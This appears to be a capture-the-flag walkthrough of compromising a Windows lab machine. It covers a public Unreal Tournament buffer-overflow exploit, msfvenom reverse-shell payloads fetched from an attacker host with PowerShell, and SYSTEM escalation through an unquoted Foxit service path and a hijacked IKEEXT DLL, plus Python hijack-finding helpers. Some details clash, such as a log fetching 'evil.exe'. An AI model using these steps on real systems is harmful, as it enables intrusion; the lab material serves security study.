Summary

We'll compromise this machine by exploiting a remote buffer overflow in an Unreal Tournament 99 game server, which we find advertised on an IRC server. We then escalate to SYSTEM via either an unquoted service path in Foxit Reader's update service or a missing DLL that the IKEEXT service loads from a writable PATH directory.

Enumeration

Nmap

We'll start off with a simple nmap scan.

root@kali:~# nmap -p- 192.168.120.84
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-24 07:33 EDT
Nmap scan report for 192.168.120.84
Host is up (0.030s latency).
Not shown: 65186 filtered ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
443/tcp   open  https
3306/tcp  open  mysql
6660/tcp  open  unknown
6661/tcp  open  unknown

...

6999/tcp  open  iatp-normalpri
7000/tcp  open  afs3-fileserver
7001/tcp  open  afs3-callback
7005/tcp  open  afs3-volser
7007/tcp  open  afs3-bos
64738/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1211.68 seconds
root@kali:~#

The cluster of open ports from 6660 to 7007 is typical of an IRC server (we later see InspIRCd installed on the target), and 64738/tcp is Mumble's default port.

FTP

We are able to log in as guest with an empty password, but don't have write privileges.

root@kali:~/Documents/VulnHub/UT99# ftp 192.168.120.84
Connected to 192.168.120.84.
220 MadCowz FTP!
Name (192.168.120.84:root): guest
331 Password required for guest
Password:
230 Logged on
Remote system type is UNIX.
ftp> ls
200 Port command successful
150 Opening data channel for directory list.
-r-xr-xr-x 1 ftp ftp       35984520 Oct 07  2015 FoxitReader706.1126_enu_Setup.exe
-r--r--r-- 1 ftp ftp       35922892 Oct 07  2015 KB968930.msu
-r-xr-xr-x 1 ftp ftp      114238280 Oct 07  2015 xampp-win32-5.6.12-0-VC11-installer.exe
226 Transfer OK
ftp> put test.txt test.txt
local: test.txt remote: test.txt
200 Port command successful
550 Permission denied
ftp> bye
221 Goodbye
root@kali:~/Documents/VulnHub/UT99#

KB968930.msu is the Windows Management Framework Core update (Windows PowerShell 2.0 and WinRM 2.0), which suggests the target has PowerShell available. FoxitReader706.1126_enu_Setup.exe is the installer for Foxit Reader 7.0.6.1126, a version with a known unquoted service path vulnerability. Both might come in handy later.

Web Application

Let's browse the default web page with curl.

root@kali:~/Documents/VulnHub/UT99# curl 192.168.120.84 -s | html2text
****** Index of / ******
[[ICO]] Name         Last_modified    Size Description
===========================================================================
[[DIR]] public_html/ 2013-11-13 14:52    -
===========================================================================
     Apache/2.4.16 (Win32) OpenSSL/1.0.1p PHP/5.6.12 Server at
     192.168.120.84 Port 80
root@kali:~/Documents/VulnHub/UT99#

Navigating to the public_html directory, we are met with a DragonFly CMS page. The read more link leads to a post containing the following hint:

We have our first match next Friday night against Cookie Monsters, so beloved daisy has setup a practice server for user to get back into the swing of things.

Join IRC and Mumble to get more information.

Posted by Fluffy on Saturday, October 03, 2015 (11:18:32) (12 reads)

IRC

Let's install the HexChat IRC client. We can dismiss the warning about running it as root.

apt-get install hexchat -y

Next, we'll open HexChat, click Add and set the name to anything. Then, we'll click Edit, set the Server to the ip of the target machine and Port to 7000.

Next, we'll click Close and set username to anything but root.

Let's click Connect, open the Channel-List Window and select show only channels with: 1 to 9999 users. Finally, we'll click Search and observe the following:

#ut99     [+nt] Fragging since UT99!  Unreal Tournament 99 Game Server UP!  IP: *THIS*  Port: 7778

Exploitation

The Unreal Tournament 99 game server has a known remote buffer overflow (an SEH overwrite) with a public Perl exploit on Exploit-DB. Searching for it and excluding denial-of-service entries:

root@kali:~# searchsploit "Unreal Tournament" | grep -v dos
------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                           |  Path
                                                                         | (/usr/share/exploitdb/)
------------------------------------------------------------------------- ----------------------------------------
Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Arbitrary File | exploits/multiple/remote/24041.c
Unreal Tournament - Remote Buffer Overflow (SEH)                         | exploits/windows/remote/16145.pl
Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit)   | exploits/linux/remote/16848.rb
Unreal Tournament 2004 (Windows) - 'secure' Remote Overflow (Metasploit) | exploits/windows/remote/16693.rb
Unreal Tournament 2004 - 'Secure' Remote Overflow (Metasploit)           | exploits/linux/remote/10032.rb
Unreal Tournament 3 1.3 - Directory Traversal                            | exploits/windows/remote/6506.txt
------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~# file /usr/share/exploitdb/exploits/windows/remote/16145.pl
/usr/share/exploitdb/exploits/windows/remote/16145.pl: ASCII text, with CRLF line terminators
root@kali:~#

Before we consider exploitation, we must keep in mind the following:

  • Outbound port 4444/tcp is blocked
  • Outbound port 443/tcp is blocked
  • Port 7778/udp always reports as open|filtered in an nmap scan, because a UDP service that does not answer nmap's empty probe is indistinguishable from a filtered port; the IRC channel topic is what tells us the game server is really listening there

root@kali:~# nmap -p 7778 -sU -A -sV 192.168.120.84
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-24 08:40 EDT
Nmap scan report for 192.168.120.84
Host is up (0.031s latency).

PORT     STATE         SERVICE   VERSION
7778/udp open|filtered interwise
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   32.30 ms 192.168.118.1
2   32.42 ms 192.168.120.84

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.24 seconds
root@kali:~#

Since outbound 443/tcp and 4444/tcp are blocked, we'll set up a netcat listener on port 53 instead and then run the exploit with the target address and port followed by our listener's address and port:

root@kali:~/Documents/VulnHub/UT99# perl /usr/share/exploitdb/exploits/windows/remote/16145.pl 192.168.120.84 7778 192.168.118.3 53
root@kali:~/Documents/VulnHub/UT99#

Our netcat session caught the shell.

root@kali:~# nc -lvp 53
listening on [any] 53 ...
192.168.120.84: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.84] 49164
Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\UnrealTournament\System>whoami
whoami
fluffy-pc\daisy

C:\UnrealTournament\System>

Escalation

We have two privilege escalation vectors we can leverage at this point. Both rely on rebooting the machine so that the affected service restarts and runs our payload as SYSTEM, and for both we must keep the following in mind: when triggering the reboot, we need to delay it by a few seconds and chain the exit command after the shutdown flags. If we run a command like shutdown -r -t 0, the game server we exploited will likely crash while our shell is still attached and raise an error dialog on the target's desktop.

That dialog stalls the reboot until it is acknowledged, which we cannot do from a reverse shell. To avoid it, we delay the reboot by a few seconds and chain the exit command (e.g. shutdown -r -t 10 && exit). This schedules the reboot and terminates our shell cleanly a second or two before it happens, so the service is not crashed mid-connection. The reboot then completes without issues, and our listener catches the privileged shell.

Privilege Escalation Vector #1

Let's run systeminfo.

C:\UnrealTournament\System>systeminfo
systeminfo

Host Name:                 FLUFFY-PC
OS Name:                   Microsoft Windows Vista Business
OS Version:                6.0.6002 Service Pack 2 Build 6002
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          fluffy
Registered Organization:
Product ID:                89584-OEM-7332141-00029
Original Install Date:     10/1/2015, 5:09:16 AM
System Boot Time:          3/24/2020, 4:31:02 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 4/22/2019
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory:     1,023 MB
Available Physical Memory: 578 MB
Page File: Max Size:       2,312 MB
Page File: Available:      1,137 MB
Page File: In Use:         1,175 MB
Page File Location(s):     C:\\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\FLUFFY-PC
Hotfix(s):                 7 Hotfix(s) Installed.
                           [01]: KB2305420
                           [02]: KB2999226
                           [03]: KB935509
                           [04]: KB937287
                           [05]: KB938371
                           [06]: KB955430
                           [07]: KB968930
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.120.254
                                 IP address(es)
                                 [01]: 192.168.120.84

C:\UnrealTournament\System>

During the FTP enumeration, we spotted the Foxit Reader installer. Let's check whether it is actually installed.

C:\UnrealTournament\System>dir "C:\Program Files (x86)"
dir "C:\Program Files (x86)"
 Volume in drive C is HDD
 Volume Serial Number is DC74-4FCB

 Directory of C:\Program Files (x86)

10/07/2015  04:04 AM    <DIR>          .
10/07/2015  04:04 AM    <DIR>          ..
11/02/2006  06:33 AM    <DIR>          Common Files
10/07/2015  04:04 AM    <DIR>          Foxit Software
10/03/2015  02:34 AM    <DIR>          InspIRCd
04/11/2009  09:30 AM    <DIR>          Internet Explorer
11/02/2006  08:05 AM    <DIR>          MSBuild
09/30/2015  11:12 PM    <DIR>          Mumble
11/02/2006  08:05 AM    <DIR>          Reference Assemblies
04/11/2009  09:30 AM    <DIR>          Windows Calendar
01/20/2008  08:09 PM    <DIR>          Windows Collaboration
01/20/2008  08:08 PM    <DIR>          Windows Defender
04/11/2009  09:30 AM    <DIR>          Windows Mail
04/11/2009  09:30 AM    <DIR>          Windows Media Player
11/02/2006  08:05 AM    <DIR>          Windows NT
04/11/2009  09:30 AM    <DIR>          Windows Photo Gallery
04/11/2009  09:30 AM    <DIR>          Windows Sidebar
               0 File(s)              0 bytes
              17 Dir(s)  13,053,112,320 bytes free

C:\UnrealTournament\System>

Sure enough, Foxit Software is installed. Its update service also has an unquoted service path, which we can spot by listing auto-start services whose image path lies outside C:\Windows and is not wrapped in quotes:

C:\UnrealTournament\System>wmic service get name, displayname, pathname, startmode |findstr /i "auto"| findstr /i /v "c:\windows\\" | findstr /i /v """
wmic service get name, displayname, pathname, startmode |findstr /i "auto"| findstr /i /v "c:\windows\\" | findstr /i /v """
Foxit Cloud Safe Update Service                         FoxitCloudUpdateService         C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe          Auto

C:\UnrealTournament\System>

In addition, we have write permissions to the Foxit Software directory. This matters because when the service control manager starts an unquoted image path containing spaces, Windows tries each space-delimited prefix as an executable in turn (C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\Foxit.exe, C:\Program Files (x86)\Foxit Software\Foxit.exe, and so on) before it reaches FCUpdateService.exe, so a Foxit.exe we plant in a writable directory along that path runs as SYSTEM instead of the real binary.

C:\UnrealTournament\System>echo test123 > "C:\Program Files (x86)\Foxit Software\test.txt"
echo test123 > "C:\Program Files (x86)\Foxit Software\test.txt"

C:\UnrealTournament\System>type "C:\Program Files (x86)\Foxit Software\test.txt"
type "C:\Program Files (x86)\Foxit Software\test.txt"
test123

C:\UnrealTournament\System>
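
The following Python example is added here and is not part of the original write-up. It reproduces how Windows splits an unquoted service path with spaces into the executables it will try, in order, and reports which of those we could plant given the directories we can write to. The sc qc output it parses is copied from the PS section at the end of this page, and the writable directory list holds the single directory the echo test above established; both are sample inputs, and the function names are ours.

```python
import ntpath
import os

# Sample input: the "sc qc FoxitCloudUpdateService" output shown in the PS
# section of this page, pasted verbatim.
SC_QC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FoxitCloudUpdateService
TYPE               : 110  WIN32_OWN_PROCESS (interactive)
START_TYPE         : 2   AUTO_START
ERROR_CONTROL      : 1   NORMAL
BINARY_PATH_NAME   : C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
LOAD_ORDER_GROUP   :
TAG                : 0
DISPLAY_NAME       : Foxit Cloud Safe Update Service
DEPENDENCIES       :
SERVICE_START_NAME : LocalSystem
"""

# The one directory the echo test above proved writable (sample input).
WRITABLE_DIRS = ["C:\\Program Files (x86)\\Foxit Software"]


def binary_path_from_sc_qc(output):
    """Return the BINARY_PATH_NAME value from `sc qc` output, or None."""
    for line in output.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == "BINARY_PATH_NAME":
            return value.strip()
    return None


def resolve_candidates(image_path):
    """Executables CreateProcess tries, in order, for a service image path.

    A quoted path is unambiguous and yields a single candidate.  An unquoted
    path is cut at every space; each prefix without an extension gets ".exe"
    appended, and the walk stops at the first prefix that already carries an
    extension, which is taken to be the real binary (later words are its
    arguments).
    """
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return [image_path[1:].split('"', 1)[0]]
    words = image_path.split(" ")
    candidates = []
    for i in range(1, len(words) + 1):
        prefix = " ".join(words[:i])
        if ntpath.splitext(ntpath.basename(prefix))[1]:
            candidates.append(prefix)
            break
        candidates.append(prefix + ".exe")
    return candidates


def is_hijackable(image_path):
    """True when other executable names would be tried before the real one."""
    return len(resolve_candidates(image_path)) > 1


def hijack_points(image_path, writable_dirs):
    """Candidates that precede the real binary and sit in a writable directory."""
    wanted = {d.rstrip("\\").casefold() for d in writable_dirs}
    return [
        cand
        for cand in resolve_candidates(image_path)[:-1]
        if ntpath.dirname(cand).rstrip("\\").casefold() in wanted
    ]


def probe_writable_dirs(image_path):
    """On the target itself: test each candidate's directory with os.access.
    Only meaningful when run on Windows as the low-privileged user."""
    dirs = {ntpath.dirname(c) for c in resolve_candidates(image_path)[:-1]}
    return sorted(d for d in dirs if os.path.isdir(d) and os.access(d, os.W_OK))


if __name__ == "__main__":
    path = binary_path_from_sc_qc(SC_QC_OUTPUT)
    print("hijackable:", is_hijackable(path))
    for cand in resolve_candidates(path):
        print("  tries", cand)
    print("plant here:", hijack_points(path, WRITABLE_DIRS))
```

Run against the Foxit path this prints six candidates and reports C:\Program Files (x86)\Foxit Software\Foxit.exe as the planting location, which is exactly the file name the download step below uses. A path whose executable contains no spaces (for example C:\Windows\svc.exe -k netsvcs) yields a single candidate and is not hijackable, even though the full command line contains spaces.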

root@kali:~/Documents/VulnHub/UT99# searchsploit "foxit reader" | grep -v dos
------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                           |  Path
                                                                         | (/usr/share/exploitdb/)
------------------------------------------------------------------------- ----------------------------------------
Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow (Metasploit)        | exploits/windows/local/16621.rb
Foxit PDF Reader 4.2 - JavaScript File Write (Metasploit)                | exploits/windows/local/16978.rb
Foxit PDF Reader 9.0.1.1049 - Pointer Overwrite Use-After-Free (Metasplo | exploits/windows/local/45269.rb
Foxit Reader - '.png' Conversion Parsing tEXt Chunk Arbitrary Code Execu | exploits/windows/local/37699.py
Foxit Reader 3.0 (Build 1301) - PDF Universal Buffer Overflow            | exploits/windows/local/8201.pl
Foxit Reader 3.0 - Open Execute Action Stack Buffer Overflow (Metasploit | exploits/windows/local/18905.rb
Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow 'Jailbrea | exploits/windows/local/14727.py
Foxit Reader 4.1.1 - Local Stack Buffer Overflow                         | exploits/windows/local/15532.py
Foxit Reader 4.1.1 - Local Stack Overflow (Egghunter)                    | exploits/windows/local/15542.py
Foxit Reader 7.0.6.1126 - Unquoted Service Path Privilege Escalation     | exploits/windows/local/36390.txt
Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR & DEP Bypass)            | exploits/windows/local/45163.txt
Foxit Reader 9.0.1.1049 - Remote Code Execution                          | exploits/windows/remote/44941.txt
Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption                   | exploits/windows/local/36859.txt
Foxit Reader Plugin - URL Processing Buffer Overflow (Metasploit)        | exploits/windows/remote/24502.rb
------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~/Documents/VulnHub/UT99# file /usr/share/exploitdb/exploits/windows/local/36390.txt
/usr/share/exploitdb/exploits/windows/local/36390.txt: UTF-8 Unicode (with BOM) text, with CRLF line terminators
root@kali:~/Documents/VulnHub/UT99#

Next, we'll prepare a malicious executable and start a Python web server to host it. Since outbound 443/tcp and 4444/tcp are blocked, the reverse shell calls back on port 444, and because windows/shell_reverse_tcp is stageless we can catch it with plain netcat.

root@kali:~/Documents/VulnHub/UT99# msfvenom -p windows/shell_reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.118.3 LPORT=444 > pwn.exe
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 324 (iteration=0)
generic/none chosen with final size 324
Payload size: 324 bytes
Final size of exe file: 73802 bytes
root@kali:~/Documents/VulnHub/UT99#

root@kali:~/Documents/VulnHub/UT99# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Let's download the malicious file onto the target machine.

C:\UnrealTournament\System>dir "C:\Program Files (x86)\Foxit Software\"
dir "C:\Program Files (x86)\Foxit Software\"
 Volume in drive C is HDD
 Volume Serial Number is DC74-4FCB

 Directory of C:\Program Files (x86)\Foxit Software

03/24/2020  07:29 AM    <DIR>          .
03/24/2020  07:29 AM    <DIR>          ..
10/07/2015  04:05 AM    <DIR>          Foxit Reader
03/24/2020  07:29 AM                10 test.txt
               1 File(s)             10 bytes
               3 Dir(s)  13,052,928,000 bytes free

C:\UnrealTournament\System>powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.118.3/pwn.exe', 'C:\Program Files (x86)\Foxit Software\Foxit.exe')"
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.118.3/pwn.exe', 'C:\Program Files (x86)\Foxit Software\Foxit.exe')"

C:\UnrealTournament\System>dir "C:\Program Files (x86)\Foxit Software\"
dir "C:\Program Files (x86)\Foxit Software\"
 Volume in drive C is HDD
 Volume Serial Number is DC74-4FCB

 Directory of C:\Program Files (x86)\Foxit Software

03/24/2020  07:39 AM    <DIR>          .
03/24/2020  07:39 AM    <DIR>          ..
10/07/2015  04:05 AM    <DIR>          Foxit Reader
03/24/2020  07:39 AM           255,488 Foxit.exe
03/24/2020  07:29 AM                10 test.txt
               2 File(s)        255,498 bytes
               3 Dir(s)  13,052,563,456 bytes free

C:\UnrealTournament\System>

root@kali:~/Documents/VulnHub/UT99# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.120.84 - - [24/Mar/2020 10:39:14] "GET /evil.exe HTTP/1.1" 200 -

We'll need to press enter after the PowerShell command to get the command prompt back. Finally, we will set up a netcat listener and then power cycle the machine to restart the service with the malicious executable file.

C:\\UnrealTournament\\System>shutdown -r -t 10 && exit
shutdown -r -t 10 && exit
root@kali:~#

root@kali:~# nc -lvp 444
listening on [any] 444 ...
192.168.120.84: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.84] 49158
Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

Privilege Escalation Vector #2

This vector abuses the IKE and AuthIP IPsec Keying Modules service (IKEEXT), which on Windows Vista and 7 tries to load a DLL named wlbsctrl.dll that does not ship with the OS. The service runs as SYSTEM and, because the DLL is missing from the system directories, the loader falls through to the directories in PATH; a writable PATH directory therefore lets us plant our own wlbsctrl.dll and have it loaded at the next service start. First, we check that the IKEEXT service exists, is enabled, and is running.

C:\UnrealTournament\System>sc query IKEEXT
sc query IKEEXT

SERVICE_NAME: IKEEXT
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\UnrealTournament\System>

Next, we need to confirm that wlbsctrl.dll is not already present. Note that dir /s only recurses from the current directory (here C:\UnrealTournament\System); to search the whole drive you would run dir C:\wlbsctrl.dll /s, and what really matters is that the DLL is absent from the directories searched before PATH, such as C:\Windows\System32.

C:\UnrealTournament\System>dir wlbsctrl.dll /s
dir wlbsctrl.dll /s
 Volume in drive C is HDD
 Volume Serial Number is DC74-4FCB
File Not Found

C:\UnrealTournament\System>

Next, we'll check the PATH variable.

C:\UnrealTournament\System>PATH
PATH
PATH=C:\Python\Scripts\;C:\Python\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\

C:\UnrealTournament\System>

The C:\Python\Scripts and C:\Python directories are interesting because they are non-default, user-installed entries at the front of PATH, so let's check their permissions.

C:\UnrealTournament\System>icacls C:\Python\Scripts\
icacls C:\Python\Scripts\
C:\Python\Scripts\ BUILTIN\Administrators:(I)(F)
                   BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                   NT AUTHORITY\SYSTEM:(I)(F)
                   NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                   BUILTIN\Users:(I)(OI)(CI)(RX)
                   NT AUTHORITY\Authenticated Users:(I)(M)
                   NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files

C:\UnrealTournament\System>icacls C:\Python\
icacls C:\Python\
C:\Python\ BUILTIN\Administrators:(I)(F)
           BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
           BUILTIN\Users:(I)(OI)(CI)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)
           NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files

C:\UnrealTournament\System>

Both folders grant Modify (M) to NT AUTHORITY\Authenticated Users directly (the entries without the (IO) inherit-only flag apply to the folder itself, not just to its children), so we can create files in either of them and use one to write our custom wlbsctrl.dll file.
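
To generalise the PATH check, here is an added Python example, not code from the original write-up, that parses icacls output for each PATH entry and reports, in search order, the directories where a low-privilege principal can create files. The PATH string and the icacls listings for C:\Python\Scripts and C:\Python are the ones shown above; the C:\Windows\system32 listing is a constructed sample of a stock ACL, included for contrast. It honours the (IO) inherit-only flag and treats a DENY entry as overriding, two details that are easy to misread by eye.

```python
import re

# Sample inputs: PATH and the two icacls listings shown above (copied from the
# page), plus a constructed C:\Windows\system32 listing with the default ACL.
PATH_ENV = ("C:\\Python\\Scripts\\;C:\\Python\\;C:\\Windows\\system32;C:\\Windows;"
            "C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\")

ICACLS = {
    "C:\\Python\\Scripts\\": r"""C:\Python\Scripts\ BUILTIN\Administrators:(I)(F)
                   BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                   NT AUTHORITY\SYSTEM:(I)(F)
                   NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                   BUILTIN\Users:(I)(OI)(CI)(RX)
                   NT AUTHORITY\Authenticated Users:(I)(M)
                   NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files
""",
    "C:\\Python\\": r"""C:\Python\ BUILTIN\Administrators:(I)(F)
           BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
           BUILTIN\Users:(I)(OI)(CI)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)
           NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files
""",
    # constructed: what a stock system32 directory ACL looks like
    "C:\\Windows\\system32": r"""C:\Windows\system32 NT SERVICE\TrustedInstaller:(F)
                    NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                    NT AUTHORITY\SYSTEM:(M)
                    NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                    BUILTIN\Administrators:(M)
                    BUILTIN\Administrators:(OI)(CI)(IO)(F)
                    BUILTIN\Users:(RX)
                    BUILTIN\Users:(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files
""",
}

# Principals an ordinary interactive logon holds.
LOW_PRIV = {"everyone", "builtin\\users",
            "nt authority\\authenticated users", "nt authority\\interactive"}
# Rights that allow adding a file to a directory: full, modify, write, or the
# specific "write data / add file" and "append data / add subdirectory" rights.
CREATE_RIGHTS = {"F", "M", "W", "WD", "AD"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([^)]*\))+)\s*$")


def _norm(path):
    return path.rstrip("\\").casefold()


def parse_icacls(path, output):
    """Parse `icacls <path>` output into a list of (principal, set of tokens)."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):            # first line carries the path prefix
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue                         # blank line or the summary footer
        tokens = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("flags")):
            tokens.update(group.split(","))  # "(GR,GE)" lists several rights
        aces.append((m.group("who"), tokens))
    return aces


def low_priv_can_create(aces):
    """Can a low-privilege principal create a file directly in this directory?
    (IO) entries are inherit-only and do not apply to the directory itself;
    a DENY entry covering a create right wins over any allow."""
    allowed = False
    for who, tokens in aces:
        if who.casefold() not in LOW_PRIV or "IO" in tokens:
            continue
        if tokens & CREATE_RIGHTS:
            if "DENY" in tokens:
                return False
            allowed = True
    return allowed


def writable_path_dirs(path_env, icacls_outputs):
    """PATH entries, in search order, where a low-privilege user can drop a DLL.
    Entries with no captured icacls output are treated as not writable."""
    by_dir = {_norm(p): (p, out) for p, out in icacls_outputs.items()}
    hits = []
    for entry in filter(None, path_env.split(";")):
        known = by_dir.get(_norm(entry))
        if known and low_priv_can_create(parse_icacls(*known)):
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for d in writable_path_dirs(PATH_ENV, ICACLS):
        print("DLL can be planted in", d)
```

With the inputs above this reports C:\Python\Scripts\ and then C:\Python\, in PATH order, and nothing for system32. Order matters when more than one entry is writable: for a DLL that exists nowhere else, the first PATH directory that contains it wins, so the earlier of the two is the safer place to plant.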

root@kali:~/Documents/VulnHub/UT99# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.118.3 LPORT=4445 -f dll > wlbsctrl.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 5120 bytes

root@kali:~/Documents/VulnHub/UT99#

Next, we'll start a Python HTTP server and transfer the malicious file onto the target machine. Note that windows/x64/meterpreter/reverse_tcp is a staged payload that expects a Metasploit multi/handler to deliver its second stage; to catch the callback with plain netcat as shown below, generate windows/x64/shell_reverse_tcp instead. The x64 payload is required because IKEEXT runs inside a 64-bit svchost.exe on this x64 build.

root@kali:~/Documents/VulnHub/UT99# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

C:\UnrealTournament\System>dir /B C:\Python\wlbsctrl.dll
dir /B C:\Python\wlbsctrl.dll
File Not Found

C:\UnrealTournament\System>powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.118.3/wlbsctrl.dll', 'C:\Python\wlbsctrl.dll')"
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.118.3/wlbsctrl.dll', 'C:\Python\wlbsctrl.dll')"

C:\UnrealTournament\System>dir /B C:\Python\wlbsctrl.dll
dir /B C:\Python\wlbsctrl.dll
wlbsctrl.dll

C:\UnrealTournament\System>

root@kali:~/Documents/VulnHub/UT99# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.120.84 - - [24/Mar/2020 11:18:17] "GET /wlbsctrl.dll HTTP/1.1" 200 -

Note that we will need to press enter after the PowerShell command to get the cmd prompt back. Finally, let's set up a netcat listener and then power cycle the machine to catch the privileged reverse shell.

C:\\UnrealTournament\\System>shutdown -r -t 10 && exit
shutdown -r -t 10 && exit
root@kali:~#

root@kali:~# nc -lvp 4445
listening on [any] 4445 ...
192.168.120.84: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.84] 49158
Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

PS

https://www.exploit-db.com/exploits/36390

Checking the installed software on the target system, we can see Foxit Reader is installed.

Directory of c:\Program Files (x86)

10/07/2015  04:04 AM    <DIR>          .
10/07/2015  04:04 AM    <DIR>          ..
11/02/2006  06:33 AM    <DIR>          Common Files
10/07/2015  04:04 AM    <DIR>          Foxit Software
10/03/2015  02:34 AM    <DIR>          InspIRCd
04/11/2009  09:30 AM    <DIR>          Internet Explorer
11/02/2006  08:05 AM    <DIR>          MSBuild
09/30/2015  11:12 PM    <DIR>          Mumble
11/02/2006  08:05 AM    <DIR>          Reference Assemblies
04/11/2009  09:30 AM    <DIR>          Windows Calendar
01/20/2008  08:09 PM    <DIR>          Windows Collaboration
01/20/2008  08:08 PM    <DIR>          Windows Defender
04/11/2009  09:30 AM    <DIR>          Windows Mail
04/11/2009  09:30 AM    <DIR>          Windows Media Player
11/02/2006  08:05 AM    <DIR>          Windows NT
04/11/2009  09:30 AM    <DIR>          Windows Photo Gallery
04/11/2009  09:30 AM    <DIR>          Windows Sidebar
0 File(s)              0 bytes
17 Dir(s)  13,051,826,176 bytes free

Querying the service on the target system shows that it runs in the context of SYSTEM and that the binary path indeed contains spaces and is not wrapped in quotes.

cmd:>sc qc FoxitCloudUpdateService
